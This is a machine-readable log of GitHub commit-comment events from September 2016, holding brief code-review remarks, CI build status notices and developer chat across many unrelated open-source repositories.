{"id":"4623657202","type":"CommitCommentEvent","actor":{"login":"rustemjantayev"},"repo":{"name":"rustemjantayev/laravel"},"payload":{"comment":{"id":19189042,"position":null,"line":null,"path":null,"commit_id":"e20dab6f1a1f1484e181e21291f4b14b928344b2","created_at":"2016-09-27T11:48:22Z","updated_at":"2016-09-27T11:48:22Z","body":"1-10 lessons in one"}},"created_at":"2016-09-27T11:48:22Z"}
{"id":"4623658592","type":"CommitCommentEvent","actor":{"login":"jschwartzenberg"},"repo":{"name":"stsp/dosemu2"},"payload":{"comment":{"id":19189043,"position":null,"line":null,"path":null,"commit_id":"7374a6e0978ee4d35f764401719a027034c0173d","created_at":"2016-09-27T11:48:42Z","updated_at":"2016-09-27T11:48:42Z","body":"That depends on the application/driver maybe? Would this be some kind of serial tablet?"}},"created_at":"2016-09-27T11:48:42Z"}
{"id":"4623661226","type":"CommitCommentEvent","actor":{"login":"davidfokkema"},"repo":{"name":"HiSPARC/publicdb"},"payload":{"comment":{"id":19189052,"position":37,"line":163,"path":"README.rst","commit_id":"aa6eca18fb40af02c547cab6eb7866c222317a80","created_at":"2016-09-27T11:49:22Z","updated_at":"2016-09-27T11:49:22Z","body":"Oops. I'll fix that. I like the GUI, but it's $9.99 on the Mac App Store."}},"created_at":"2016-09-27T11:49:22Z"}
{"id":"4623664278","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19189058,"position":null,"line":null,"path":null,"commit_id":"76ebfb0e9c7aa201e23808612c01fd1993ff5476","created_at":"2016-09-27T11:50:05Z","updated_at":"2016-09-27T11:50:05Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1169](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14322&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-27T11:50:05Z"}
{"id":"4623666611","type":"CommitCommentEvent","actor":{"login":"Ninos"},"repo":{"name":"i-MSCP/imscp"},"payload":{"comment":{"id":19189062,"position":null,"line":null,"path":null,"commit_id":"acf39ea88bd9ce2a0a318d3efe239fa0a71967cf","created_at":"2016-09-27T11:50:38Z","updated_at":"2016-09-27T11:50:38Z","body":"Jipp, sure"}},"created_at":"2016-09-27T11:50:38Z"}
{"id":"4623670513","type":"CommitCommentEvent","actor":{"login":"Ninos"},"repo":{"name":"i-MSCP/imscp"},"payload":{"comment":{"id":19189083,"position":null,"line":null,"path":null,"commit_id":"acf39ea88bd9ce2a0a318d3efe239fa0a71967cf","created_at":"2016-09-27T11:51:31Z","updated_at":"2016-09-27T11:51:31Z","body":"https://youtrack.i-mscp.net/issue/IP-1406"}},"created_at":"2016-09-27T11:51:31Z"}
{"id":"4623670634","type":"CommitCommentEvent","actor":{"login":"zanchey"},"repo":{"name":"fish-shell/fish-shell"},"payload":{"comment":{"id":19189085,"position":null,"line":null,"path":null,"commit_id":"4c34ba995985e08b947246dca62caa90315d9523","created_at":"2016-09-27T11:51:33Z","updated_at":"2016-09-27T11:51:33Z","body":"Nice one."}},"created_at":"2016-09-27T11:51:33Z"}
{"id":"4623674046","type":"CommitCommentEvent","actor":{"login":"js69"},"repo":{"name":"dokan-dev/dokany"},"payload":{"comment":{"id":19189101,"position":null,"line":null,"path":null,"commit_id":"3361dbf7e681d45d71753b2931967e0bd700e492","created_at":"2016-09-27T11:52:21Z","updated_at":"2016-09-27T11:52:21Z","body":"Hi,\r\n\r\nthe artifacts on AppVeyor do not have correct build numbers set. DokanSetup-1.0.0.5777.exe at https://ci.appveyor.com/project/Maxhy/dokany/build/job/fe06swugxn2q0ldw/artifacts has in its file properties 1.0.0.5000."}},"created_at":"2016-09-27T11:52:21Z"}
{"id":"4623676303","type":"CommitCommentEvent","actor":{"login":"Rondom"},"repo":{"name":"dokan-dev/dokany"},"payload":{"comment":{"id":19189110,"position":null,"line":null,"path":null,"commit_id":"3361dbf7e681d45d71753b2931967e0bd700e492","created_at":"2016-09-27T11:52:52Z","updated_at":"2016-09-27T11:52:52Z","body":"Not again :cry: "}},"created_at":"2016-09-27T11:52:52Z"}
{"id":"4623676864","type":"CommitCommentEvent","actor":{"login":"vijaymetatagg"},"repo":{"name":"vijaymetatagg/mytest"},"payload":{"comment":{"id":19189113,"position":null,"line":null,"path":null,"commit_id":"7ece14dc7f5fb4cf8f469cb18c3d29b0ece92631","created_at":"2016-09-27T11:53:01Z","updated_at":"2016-09-27T11:53:01Z","body":"added new"}},"created_at":"2016-09-27T11:53:01Z"}
{"id":"4623677187","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19189115,"position":null,"line":null,"path":null,"commit_id":"76ebfb0e9c7aa201e23808612c01fd1993ff5476","created_at":"2016-09-27T11:53:06Z","updated_at":"2016-09-27T11:53:06Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1170](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14325&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-27T11:53:06Z"}
{"id":"4623678914","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"Serhii-Harnyk/drill"},"payload":{"comment":{"id":19189232,"position":301,"line":284,"path":"exec/java-exec/src/main/java/org/apache/drill/exec/planner/logical/DrillConstExecutor.java","commit_id":"955547f977435ff447d4cb1f7429ba1190555789","created_at":"2016-09-27T11:53:29Z","updated_at":"2016-09-27T11:53:29Z","body":"Remove empty line above."}},"created_at":"2016-09-27T11:53:29Z"}
{"id":"4623680517","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"Serhii-Harnyk/drill"},"payload":{"comment":{"id":19189240,"position":29,"line":29,"path":"exec/java-exec/src/test/java/org/apache/drill/exec/planner/logical/TestCaseNullableTypes.java","commit_id":"955547f977435ff447d4cb1f7429ba1190555789","created_at":"2016-09-27T11:53:52Z","updated_at":"2016-09-27T11:53:52Z","body":"Add each testBuilder in separate method"}},"created_at":"2016-09-27T11:53:52Z"}
{"id":"4623682867","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"Serhii-Harnyk/drill"},"payload":{"comment":{"id":19189246,"position":39,"line":39,"path":"exec/java-exec/src/test/java/org/apache/drill/exec/planner/logical/TestCaseNullableTypes.java","commit_id":"955547f977435ff447d4cb1f7429ba1190555789","created_at":"2016-09-27T11:54:24Z","updated_at":"2016-09-27T11:54:24Z","body":"Use unordered when one row is returned"}},"created_at":"2016-09-27T11:54:24Z"}
{"id":"4623685862","type":"CommitCommentEvent","actor":{"login":"jameskoster"},"repo":{"name":"woothemes/storefront"},"payload":{"comment":{"id":19189258,"position":null,"line":null,"path":null,"commit_id":"5a51793391efd39623edf6577cf0531ed163811e","created_at":"2016-09-27T11:55:06Z","updated_at":"2016-09-27T11:55:06Z","body":"@skinnerjoe looking in to it"}},"created_at":"2016-09-27T11:55:06Z"}
{"id":"4623686650","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19189263,"position":null,"line":null,"path":null,"commit_id":"76ebfb0e9c7aa201e23808612c01fd1993ff5476","created_at":"2016-09-27T11:55:16Z","updated_at":"2016-09-27T11:55:16Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1170](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14325&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Compilation error: Scala compiler (new) Build time: 00:02:09"}},"created_at":"2016-09-27T11:55:16Z"}
{"id":"4623687513","type":"CommitCommentEvent","actor":{"login":"Pierrecl"},"repo":{"name":"lpdw/faclabprojet0"},"payload":{"comment":{"id":19189266,"position":null,"line":null,"path":null,"commit_id":"ea0509917fcc97aec9d814b5a4625f3dd3a25e8e","created_at":"2016-09-27T11:55:28Z","updated_at":"2016-09-27T11:55:28Z","body":"Why did you commit ?! 8-)"}},"created_at":"2016-09-27T11:55:28Z"}
{"id":"4623694745","type":"CommitCommentEvent","actor":{"login":"bparees"},"repo":{"name":"jim-minter/source-to-image"},"payload":{"comment":{"id":19189286,"position":52,"line":204,"path":"pkg/docker/util.go","commit_id":"546908ba138404059c8c69ab1911436cb30d2252","created_at":"2016-09-27T11:57:07Z","updated_at":"2016-09-27T11:57:07Z","body":"isn't this exactly the same as the ==2 case above?\r\n"}},"created_at":"2016-09-27T11:57:07Z"}
{"id":"4623695257","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19189288,"position":null,"line":null,"path":null,"commit_id":"76ebfb0e9c7aa201e23808612c01fd1993ff5476","created_at":"2016-09-27T11:57:13Z","updated_at":"2016-09-27T11:57:13Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1171](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14327&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-27T11:57:13Z"}
{"id":"4623696063","type":"CommitCommentEvent","actor":{"login":"js69"},"repo":{"name":"dokan-dev/dokany"},"payload":{"comment":{"id":19189294,"position":null,"line":null,"path":null,"commit_id":"3361dbf7e681d45d71753b2931967e0bd700e492","created_at":"2016-09-27T11:57:24Z","updated_at":"2016-09-27T11:57:24Z","body":"In the appveyor.yml is still a line referencing version.txt instead of version.xml:\r\n\r\n $version = Get-Content .\\version.txt"}},"created_at":"2016-09-27T11:57:24Z"}
{"id":"4623696250","type":"CommitCommentEvent","actor":{"login":"darren562"},"repo":{"name":"zhenyong/vue-router"},"payload":{"comment":{"id":19189297,"position":64,"line":64,"path":"docs/zh-cn/essentials/dynamic-matching.md","commit_id":"4616ab25e2b78206114bb473d10ac87b896215c5","created_at":"2016-09-27T11:57:27Z","updated_at":"2016-09-27T11:57:27Z","body":"改成：匹配的优先级就按照  ”路由 ” 定义的顺序 ，加入路由两字。"}},"created_at":"2016-09-27T11:57:27Z"}
{"id":"4623697386","type":"CommitCommentEvent","actor":{"login":"leleuj"},"repo":{"name":"pac4j/spring-security-pac4j"},"payload":{"comment":{"id":19189301,"position":null,"line":null,"path":null,"commit_id":"2d0d5923c0a9a60e000261e12c96947374399dc5","created_at":"2016-09-27T11:57:42Z","updated_at":"2016-09-27T11:57:42Z","body":"OK. So it's a mistake. Can you add them back (via a PR)?"}},"created_at":"2016-09-27T11:57:42Z"}
{"id":"4623698117","type":"CommitCommentEvent","actor":{"login":"OEtzi007"},"repo":{"name":"OEtzi007/IntelligentTicTacToe"},"payload":{"comment":{"id":19189303,"position":8,"line":7,"path":"tictactoe.cpp","commit_id":"60f566076d902538833868310b210d078db48bb4","created_at":"2016-09-27T11:57:51Z","updated_at":"2016-09-27T11:57:51Z","body":"Board wird geändert und temp zurückgegeben, doppelt schlecht!!!"}},"created_at":"2016-09-27T11:57:51Z"}
{"id":"4623698529","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19189307,"position":null,"line":null,"path":null,"commit_id":"76ebfb0e9c7aa201e23808612c01fd1993ff5476","created_at":"2016-09-27T11:57:57Z","updated_at":"2016-09-27T11:57:57Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1171](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14327&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:44"}},"created_at":"2016-09-27T11:57:57Z"}
{"id":"4623700904","type":"CommitCommentEvent","actor":{"login":"kamu60"},"repo":{"name":"simonpucher/AgenaTrader"},"payload":{"comment":{"id":19189315,"position":null,"line":null,"path":null,"commit_id":"78c75c98ab7559289c92b7c697f73a603d309ff2","created_at":"2016-09-27T11:58:30Z","updated_at":"2016-09-27T11:58:30Z","body":"Danke für die Info.\r\nHabe in der Zwischenzeit schon einen Testindikator laufen der deinen Example-Indikator mit unterschiedlichen TimeFrames aufruft.\r\nDas funktioniert mittlerweile ja echt super.\r\n\r\nDanke nochmals – insbesondere auch für die Example-Codes.\r\n\r\n\r\n\r\n\r\n\r\nVon: Simon Pucher [mailto:notifications@github.com]\r\nGesendet: Dienstag, 27. September 2016 13:43\r\nAn: simonpucher/AgenaTrader\r\nCc: kamu60; Comment\r\nBetreff: Re: [simonpucher/AgenaTrader] Update Example_Indicator_Condition_Strategy_Advanced.md (78c75c9)\r\n\r\n\r\nServus,\r\n\r\nden Timeframe kannst du bei Indikatoren einfach über den Konstruktor übergeben.\r\nAlles mit dem Kategorie Etikett Parameters kommt dann in den Konstruktor.\r\n=> [Category(\"Parameters\")]\r\n\r\nAm Beispiel der ATR: http://www.tradeescort.com/AgenaScriptHelp/AgenaScript.html?AverageTrueRangeATR.html\r\nDie Daten des Timeframes kannst du dann über die iDataSeries übergeben.\r\nATR(int period)\r\nATR(IDataSeries input, int period)\r\n\r\nDie unterschiedlichen TimeFrames kannst du ganze einfach über MultiBar lösen. Du ladest dir alle TimeFrames im InitRequirements event und greifst dann im OnBarUpdate darauf zu.\r\n\r\nprotected override void InitRequirements()\r\n{\r\nAdd(new TimeFrame(DatafeedHistoryPeriodicity.Day, 1));\r\n}\r\n\r\nIn Zukunft wird es noch mehr Tutorials im offiziellen AgenaTrader GitHub Projekt geben. Wir können sicherlich auch so ein Beispiel zusammen erstellen.\r\n\r\n—\r\nYou are receiving this because you commented.\r\nReply to this email directly, view it on GitHub<https://github.com/simonpucher/AgenaTrader/commit/78c75c98ab7559289c92b7c697f73a603d309ff2#commitcomment-19189007>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AVbfgYO6V6jE-i8J9ssp_Xuh1-YTxc03ks5quQFggaJpZM4KHeeF>.\r\n"}},"created_at":"2016-09-27T11:58:30Z"}
{"id":"4623700994","type":"CommitCommentEvent","actor":{"login":"bparees"},"repo":{"name":"jim-minter/source-to-image"},"payload":{"comment":{"id":19189316,"position":24,"line":195,"path":"pkg/docker/util.go","commit_id":"546908ba138404059c8c69ab1911436cb30d2252","created_at":"2016-09-27T11:58:31Z","updated_at":"2016-09-27T11:58:31Z","body":"the name needs to have the registry stripped off the front, right?\r\n\r\ndocker.io/my/long/imagerepo/name:foo\r\n\r\nshould become:\r\nref.Registry=docker.io\r\nref.Name=my/long/imagerepo/name\r\nref.Tag=foo\r\n\r\ni think?\r\n"}},"created_at":"2016-09-27T11:58:31Z"}
{"id":"4623707197","type":"CommitCommentEvent","actor":{"login":"Dekedro"},"repo":{"name":"Dekedro/NMA-problems"},"payload":{"comment":{"id":19189335,"position":56,"line":55,"path":"losimo_kauliukas/Savas.cpp","commit_id":"8f974e7898dde9d5dace415bb8810bb86e8162fe","created_at":"2016-09-27T11:59:55Z","updated_at":"2016-09-27T11:59:55Z","body":"&& startNum != endNum"}},"created_at":"2016-09-27T11:59:55Z"}
{"id":"4623708398","type":"CommitCommentEvent","actor":{"login":"bparees"},"repo":{"name":"jim-minter/source-to-image"},"payload":{"comment":{"id":19189343,"position":34,"line":198,"path":"pkg/docker/util.go","commit_id":"546908ba138404059c8c69ab1911436cb30d2252","created_at":"2016-09-27T12:00:10Z","updated_at":"2016-09-27T12:00:10Z","body":"so we used to default a name like:  myimage:foo to effectively be:  library/myimage:foo\r\n\r\nsince we're not doing that anymore, will \"default\" images still work the same way?  we're essentially changing behavior here..."}},"created_at":"2016-09-27T12:00:10Z"}
{"id":"4623708445","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19189344,"position":null,"line":null,"path":null,"commit_id":"acd75a57be96fe91a987630bc2cbf4f3f8a4188b","created_at":"2016-09-27T12:00:11Z","updated_at":"2016-09-27T12:00:11Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1172](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14329&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-27T12:00:11Z"}
{"id":"4623710000","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19189348,"position":null,"line":null,"path":null,"commit_id":"76ebfb0e9c7aa201e23808612c01fd1993ff5476","created_at":"2016-09-27T12:00:27Z","updated_at":"2016-09-27T12:00:27Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1169](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14322&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **UNKNOWN**\nSummary: Canceled (Tests passed: 226, ignored: 3; exit code 137 (new)) Build time: 00:10:21"}},"created_at":"2016-09-27T12:00:27Z"}
{"id":"4623711836","type":"CommitCommentEvent","actor":{"login":"Rondom"},"repo":{"name":"dokan-dev/dokany"},"payload":{"comment":{"id":19189356,"position":null,"line":null,"path":null,"commit_id":"3361dbf7e681d45d71753b2931967e0bd700e492","created_at":"2016-09-27T12:00:51Z","updated_at":"2016-09-27T12:00:51Z","body":"I think it has to do with @Liryna releasing 1.0.0 and changing changelog.md, but that is just a blind guess."}},"created_at":"2016-09-27T12:00:51Z"}
{"id":"4623713063","type":"CommitCommentEvent","actor":{"login":"FagnerMartinsBrack"},"repo":{"name":"impress/impress.js"},"payload":{"comment":{"id":19189359,"position":5,"line":7,"path":"circle.yml","commit_id":"a5fd940cd9a32cf0e3cf66880f2b7350d516c426","created_at":"2016-09-27T12:01:06Z","updated_at":"2016-09-27T12:01:06Z","body":"Are you sure this is the right command? CircleCI says:\r\n\r\n> openssl:Error: '-aes-256-cbc' is an invalid command."}},"created_at":"2016-09-27T12:01:06Z"}
{"id":"4623716271","type":"CommitCommentEvent","actor":{"login":"simonpucher"},"repo":{"name":"simonpucher/AgenaTrader"},"payload":{"comment":{"id":19189367,"position":null,"line":null,"path":null,"commit_id":"78c75c98ab7559289c92b7c697f73a603d309ff2","created_at":"2016-09-27T12:01:49Z","updated_at":"2016-09-27T12:01:49Z","body":"Sehr gern."}},"created_at":"2016-09-27T12:01:49Z"}
{"id":"4623716468","type":"CommitCommentEvent","actor":{"login":"svoronovcv"},"repo":{"name":"svoronovcv/cv_python"},"payload":{"comment":{"id":19189369,"position":null,"line":null,"path":null,"commit_id":"66b33188857e86f7884af9e32a64658156f57293","created_at":"2016-09-27T12:01:52Z","updated_at":"2016-09-27T12:01:52Z","body":"Some webcam tools"}},"created_at":"2016-09-27T12:01:52Z"}
{"id":"4623718503","type":"CommitCommentEvent","actor":{"login":"153957"},"repo":{"name":"HiSPARC/publicdb"},"payload":{"comment":{"id":19189372,"position":37,"line":163,"path":"README.rst","commit_id":"aa6eca18fb40af02c547cab6eb7866c222317a80","created_at":"2016-09-27T12:02:19Z","updated_at":"2016-09-27T12:02:19Z","body":"There is also this similar, but free, tool: [SSH Tunnel Manager](https://www.tynsoe.org/v2/stm/).\r\nIt lacked updates a few years ago and was not working reliably, so I switched to SSH Tunnel.\r\nBut it seems it is not completely dead, STM has been updated for El Cap, and the last update seems to be from 31th July this year.."}},"created_at":"2016-09-27T12:02:19Z"}
{"id":"4623721304","type":"CommitCommentEvent","actor":{"login":"bhargavdinc"},"repo":{"name":"dhanashreeinc/dinc-test-project"},"payload":{"comment":{"id":19189377,"position":null,"line":null,"path":null,"commit_id":"e8aec8ad1811810a53f6198d3cd11d9033f74445","created_at":"2016-09-27T12:02:57Z","updated_at":"2016-09-27T12:02:57Z","body":"mg"}},"created_at":"2016-09-27T12:02:57Z"}
{"id":"4623722524","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19189378,"position":null,"line":null,"path":null,"commit_id":"acd75a57be96fe91a987630bc2cbf4f3f8a4188b","created_at":"2016-09-27T12:03:12Z","updated_at":"2016-09-27T12:03:12Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1172](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14329&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:03:01"}},"created_at":"2016-09-27T12:03:12Z"}
{"id":"4623722672","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19189379,"position":null,"line":null,"path":null,"commit_id":"a612e2d863f46c3a0a28dacc06fb4d859f3c8c8c","created_at":"2016-09-27T12:03:14Z","updated_at":"2016-09-27T12:03:14Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 65](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14331&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) is now running\n"}},"created_at":"2016-09-27T12:03:14Z"}
{"id":"4623723112","type":"CommitCommentEvent","actor":{"login":"honeyhoney"},"repo":{"name":"Looking4Group/L4G_Core"},"payload":{"comment":{"id":19189381,"position":null,"line":null,"path":null,"commit_id":"442fbf019f5bb7c68fc85f4bacbcba0b8b1dd24c","created_at":"2016-09-27T12:03:20Z","updated_at":"2016-09-27T12:03:20Z","body":"Using https://github.com/SiarkowyMods/Timed .debug threatlist commands will be distributed amongst the raid in any case."}},"created_at":"2016-09-27T12:03:20Z"}
{"id":"4623729495","type":"CommitCommentEvent","actor":{"login":"KindDragon"},"repo":{"name":"gitextensions/gitextensions"},"payload":{"comment":{"id":19189398,"position":null,"line":null,"path":null,"commit_id":"05c13bf15c1594854a9ca2d5c5f027e902afd604","created_at":"2016-09-27T12:04:45Z","updated_at":"2016-09-27T12:04:45Z","body":"We working on it https://github.com/gitextensions/gitextensions/issues?q=is%3Aopen+is%3Aissue+milestone%3A2.49"}},"created_at":"2016-09-27T12:04:45Z"}
{"id":"4623729670","type":"CommitCommentEvent","actor":{"login":"panda1298"},"repo":{"name":"panda1298/-"},"payload":{"comment":{"id":19189399,"position":null,"line":null,"path":null,"commit_id":"8b4f8cf163140828684f8739ec1cb2d64ca21cb0","created_at":"2016-09-27T12:04:47Z","updated_at":"2016-09-27T12:04:47Z","body":"高精度四则运算代码\r\n输入中含空格和空行均默认错误\r\n含符号，每行输出对应一个结果。"}},"created_at":"2016-09-27T12:04:47Z"}
{"id":"4623731461","type":"CommitCommentEvent","actor":{"login":"mercury233"},"repo":{"name":"Fluorohydride/ygopro-pre-script"},"payload":{"comment":{"id":19189400,"position":null,"line":null,"path":null,"commit_id":"2582c6ee86b25df16776a9a7c8d5d79a87a01c75","created_at":"2016-09-27T12:05:12Z","updated_at":"2016-09-27T12:05:12Z","body":"It works for me.\r\n\r\n![image](https://cloud.githubusercontent.com/assets/13391795/18872541/99f7b77a-84ed-11e6-8a1e-bcac8c4d042c.png)\r\n![image](https://cloud.githubusercontent.com/assets/13391795/18872550/a2029df4-84ed-11e6-9112-9bdd5ec90c6d.png)"}},"created_at":"2016-09-27T12:05:12Z"}
{"id":"4623732035","type":"CommitCommentEvent","actor":{"login":"xurizaemon"},"repo":{"name":"fuzionnz/uk.co.vedaconsulting.mailchimp"},"payload":{"comment":{"id":19189402,"position":null,"line":null,"path":null,"commit_id":"a08831c353c2fcc7c724cdd2f800ca3ef1cbda87","created_at":"2016-09-27T12:05:18Z","updated_at":"2016-09-27T12:05:18Z","body":"The preg_match here is just so I don't go💥  in event of actually getting the expected inputs."}},"created_at":"2016-09-27T12:05:18Z"}
{"id":"4623738950","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19189417,"position":null,"line":null,"path":null,"commit_id":"a612e2d863f46c3a0a28dacc06fb4d859f3c8c8c","created_at":"2016-09-27T12:06:41Z","updated_at":"2016-09-27T12:06:41Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 65](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14331&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) outcome was **SUCCESS**\nSummary: Running Build time: 00:03:27"}},"created_at":"2016-09-27T12:06:41Z"}
{"id":"4623742232","type":"CommitCommentEvent","actor":{"login":"Hotride"},"repo":{"name":"Hotride/OrionUO"},"payload":{"comment":{"id":19189428,"position":null,"line":null,"path":null,"commit_id":"5c44b5f9304d6c38bac8a7415ca774a6527065ef","created_at":"2016-09-27T12:07:26Z","updated_at":"2016-09-27T12:07:26Z","body":"Task 0000055."}},"created_at":"2016-09-27T12:07:26Z"}
{"id":"4623743456","type":"CommitCommentEvent","actor":{"login":"darren562"},"repo":{"name":"zhenyong/vue-router"},"payload":{"comment":{"id":19189430,"position":78,"line":78,"path":"docs/zh-cn/essentials/nested-routes.md","commit_id":"4616ab25e2b78206114bb473d10ac87b896215c5","created_at":"2016-09-27T12:07:42Z","updated_at":"2016-09-27T12:07:42Z","body":"任意多层    改成：很多层"}},"created_at":"2016-09-27T12:07:42Z"}
{"id":"4623744882","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19189433,"position":null,"line":null,"path":null,"commit_id":"dea83dbd376f22d2eff4c844392cc9301e3fb98e","created_at":"2016-09-27T12:08:01Z","updated_at":"2016-09-27T12:08:01Z","body":"hmm - i now switched to vuplus-transtreamproxy - same behaviour."}},"created_at":"2016-09-27T12:08:01Z"}
{"id":"4623745221","type":"CommitCommentEvent","actor":{"login":"PicoCentauri"},"repo":{"name":"PicoCentauri/gromacs"},"payload":{"comment":{"id":19189434,"position":40,"line":535,"path":"src/gromacs/ewald/long-range-correction.cpp","commit_id":"0f9438494281668e0f9282765009889c209cb10f","created_at":"2016-09-27T12:08:05Z","updated_at":"2016-09-27T12:08:05Z","body":"Won't work for parallelize systems..."}},"created_at":"2016-09-27T12:08:05Z"}
{"id":"4623746692","type":"CommitCommentEvent","actor":{"login":"davidkpiano"},"repo":{"name":"davidkpiano/react-redux-form"},"payload":{"comment":{"id":19189436,"position":30,"line":30,"path":"native.js","commit_id":"b5bbd4de56157db0fe0154719650fcabd2200222","created_at":"2016-09-27T12:08:24Z","updated_at":"2016-09-27T12:08:24Z","body":"Yep! I caught that and fixed it."}},"created_at":"2016-09-27T12:08:24Z"}
{"id":"4623750259","type":"CommitCommentEvent","actor":{"login":"pkgdemon"},"repo":{"name":"trueos/trueos-desktop"},"payload":{"comment":{"id":19189438,"position":null,"line":null,"path":null,"commit_id":"6c13e1fbf58152a4cbcf14986aa66ee4c4c1272a","created_at":"2016-09-27T12:09:09Z","updated_at":"2016-09-27T12:09:09Z","body":"No problem.  Our CI catches it, and I can regenerate a new one.  Not a big deal."}},"created_at":"2016-09-27T12:09:09Z"}
{"id":"4623755041","type":"CommitCommentEvent","actor":{"login":"luudinhmac"},"repo":{"name":"luudinhmac/GITHUB"},"payload":{"comment":{"id":19189448,"position":4,"line":14,"path":"GitHub/src/ca/GhitHub/Main.java","commit_id":"8d013250ba7e6482ca77a22c625e48469d51827b","created_at":"2016-09-27T12:10:08Z","updated_at":"2016-09-27T12:10:08Z","body":"System.out.println(\"help\");"}},"created_at":"2016-09-27T12:10:08Z"}
{"id":"4623755079","type":"CommitCommentEvent","actor":{"login":"alankelly"},"repo":{"name":"NumScale/boost.simd"},"payload":{"comment":{"id":19189449,"position":64,"line":64,"path":"include/boost/simd/arch/x86/avx/simd/function/deinterleave.hpp","commit_id":"b8458ae8a23ebc307b7e3ab5d2ac15d85968d16b","created_at":"2016-09-27T12:10:09Z","updated_at":"2016-09-27T12:10:09Z","body":"So it seems the problem comes from lines 60 & 61 with auto types. When these lines are:\r\npack<float> = ....\r\nthe bitwise cast is free (using the new bitwise_cast function I added to avx for float -> float). Using auto, it passes by generic version"}},"created_at":"2016-09-27T12:10:09Z"}
{"id":"4623763288","type":"CommitCommentEvent","actor":{"login":"Serg-Norseman"},"repo":{"name":"Serg-Norseman/GEDKeeper"},"payload":{"comment":{"id":19189467,"position":null,"line":null,"path":null,"commit_id":"463921af68e7c1dc15eca0eb53025501a0e0b27f","created_at":"2016-09-27T12:11:54Z","updated_at":"2016-09-27T12:11:54Z","body":"no, not necessary :)"}},"created_at":"2016-09-27T12:11:54Z"}
{"id":"4623766295","type":"CommitCommentEvent","actor":{"login":"cebe"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":19189471,"position":6,"line":27,"path":"framework/CHANGELOG.md","commit_id":"3ba72da6fa11c7565de7ceb002bdf6ff86c841d4","created_at":"2016-09-27T12:12:31Z","updated_at":"2016-09-27T12:12:31Z","body":"This seems to cause a lot of duplicate issues in CHANGELOG: https://github.com/yiisoft/yii2/blob/master/.gitattributes#L37-L39\r\n\r\n@yiisoft/core-developers I recommend to run `./build/build release/sort-changelog framework` on a regular basis."}},"created_at":"2016-09-27T12:12:31Z"}
{"id":"4623768280","type":"CommitCommentEvent","actor":{"login":"enisbt"},"repo":{"name":"enisbt/bilgi-shuttle-api"},"payload":{"comment":{"id":19189476,"position":null,"line":null,"path":null,"commit_id":"e64af4c2729b93e0b7a89c078d86e4348101ce49","created_at":"2016-09-27T12:12:59Z","updated_at":"2016-09-27T12:12:59Z","body":"Added Karaköy node and Karaköy-Santral route. Had to use an image for Karaköy, that image is not relevant."}},"created_at":"2016-09-27T12:12:59Z"}
